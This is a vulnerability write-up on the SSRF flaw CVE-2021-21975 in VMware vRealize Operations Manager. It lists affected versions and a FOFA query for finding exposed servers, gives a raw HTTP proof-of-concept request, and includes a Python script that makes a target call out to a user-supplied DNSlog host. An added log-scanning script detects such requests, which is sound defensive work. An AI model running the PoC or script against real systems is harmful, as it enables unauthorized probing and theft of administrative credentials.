    VMware vRealize Operations Manager API SSRF漏洞 (CVE-2021-21975).md
    2.57 KB / 2021-05-21 09:14:38
        # VMware vRealize Operations Manager API SSRF Vulnerability (CVE-2021-21975)
    
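    An attacker who can reach the vRealize Operations Manager API can pass crafted parameters to the server to carry out a server-side request forgery (SSRF) attack, stealing administrative credentials and gaining control over some functionality.
    
    OVA download: https://my.vmware.com/group/vmware/patch#search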
    
    FOFA:
    
    ```
    app="vmware-vRealize-Operations-Manager"
    ```
    
    Affected versions:
    
    * vRealize Operations Manager 8.3.0
    * vRealize Operations Manager 8.2.0
    * vRealize Operations Manager 8.1.1
    * vRealize Operations Manager 8.1.0
    * vRealize Operations Manager 8.0.1
    * vRealize Operations Manager 8.0.0
    * vRealize Operations Manager 7.5.0
    
    **PoC:**
    
    ```
    POST /casa/nodes/thumbprints HTTP/1.1
    Host:target
    Content-Type: application/json;charset=UTF-8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    
    ["127.0.0.1:443/ui/"]
    ```
    
    nuclei PoC: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml
    
    poc.py:
    
    ```py
    # CVE-2021-21975
    # FOFA query: title="vRealize Operations Manager"
    
    import requests
    import urllib3
    
    urllib3.disable_warnings()
    
    def title():
        print("[-------------------------------------------------------------]")
        print("[-------- VMware vRealize Operations Manager SSRF漏洞 ---------]")
        print("[--------               CVE-2021-21975               ----------]")
        print("[--------       use:python3 CVE-2021-21975         ------------]")
        print("[--------              Author:Henry4E36            ------------]")
        print("[-------------------------------------------------------------]")
    
    
    def target_url(url,dnslog):
        target_url = url + "/casa/nodes/thumbprints"
        headers = {
            "User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0",
            "Content-Type" : "application/json;charset=UTF-8"
        }
        data = f'["{dnslog}"]'
        try:
            res = requests.post(url=target_url,headers=headers,data=data,verify=False,timeout=5)
            if res.status_code == 200:
                print(f"[!]  \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m")
                print(f"[0]  响应为:{res.text}")
            else:
                print(f"[0]  目标系统: {url} 不存在SSRF漏洞")
        except Exception as e:
            print("[!]  目标系统出现意外错误!\n",e)
    
    
    if __name__ == "__main__":
        title()
        url = str(input("[-] 请输入需要检测的URL:\n"))
        dnslog = str(input("[-] 请输入DNSlog:\n"))
        target_url(url,dnslog)
    ```
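
Detection-side counterpart to the PoC request above, added here as an example (it is not part of the original page or of any VMware tooling): it scans web access logs for POSTs to `/casa/nodes/thumbprints` coming from sources outside the known cluster nodes. The combined log format, the `cluster_nodes` allowlist and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import posixpath
import re
from urllib.parse import unquote

SSRF_PATH = "/casa/nodes/thumbprints"  # endpoint from the PoC request on this page

# Assumption: access logs use the Apache/NGINX "combined" layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

SAMPLE_LOG = [  # constructed lines, not taken from a real appliance
    '10.0.0.11 - - [21/May/2021:09:10:01 +0000] "POST /casa/nodes/thumbprints HTTP/1.1" 200 412 "-" "cluster-agent"',
    '203.0.113.50 - - [21/May/2021:09:12:44 +0000] "POST /casa/nodes/thumbprints HTTP/1.1" 200 388 "-" "Mozilla/5.0"',
    '203.0.113.50 - - [21/May/2021:09:12:45 +0000] "GET /ui/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/May/2021:09:13:02 +0000] "POST //casa/./nodes/%74humbprints/?x=1 HTTP/1.1" 401 0 "-" "curl/7.68.0"',
]

def normalize(target):
    """Drop query/fragment, percent-decode and collapse the path, so spelling
    variants of the endpoint still match (over-matching only costs a review)."""
    path = unquote(target.split("?", 1)[0].split("#", 1)[0])
    return "/" + posixpath.normpath(path).strip("/").lower()

def find_suspect_requests(lines, cluster_nodes):
    """Return (ip, timestamp, status) for POSTs to SSRF_PATH whose source is
    not one of the expected cluster node addresses or networks."""
    allowed = [ipaddress.ip_network(n) for n in cluster_nodes]
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or normalize(m["target"]) != SSRF_PATH:
            continue
        try:
            src = ipaddress.ip_address(m["ip"])
        except ValueError:
            src = None  # hostname or junk in the client field: treat as untrusted
        if src is None or not any(src in net for net in allowed):
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits

if __name__ == "__main__":
    # cluster_nodes is a hypothetical allowlist; fill it from your own inventory.
    for ip, ts, status in find_suspect_requests(SAMPLE_LOG, ["10.0.0.11"]):
        print(f"{ts}  {ip}  POST {SSRF_PATH} -> {status}")
```

The JSON body that carries the SSRF destination is not recorded in access logs, so each hit should be correlated with outbound connections from the appliance around the same timestamp.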
    
    ref:
    
    * https://www.vmware.com/security/advisories/VMSA-2021-0004.html
    * https://forum.ywhack.com/thread-115338-1-7.html
    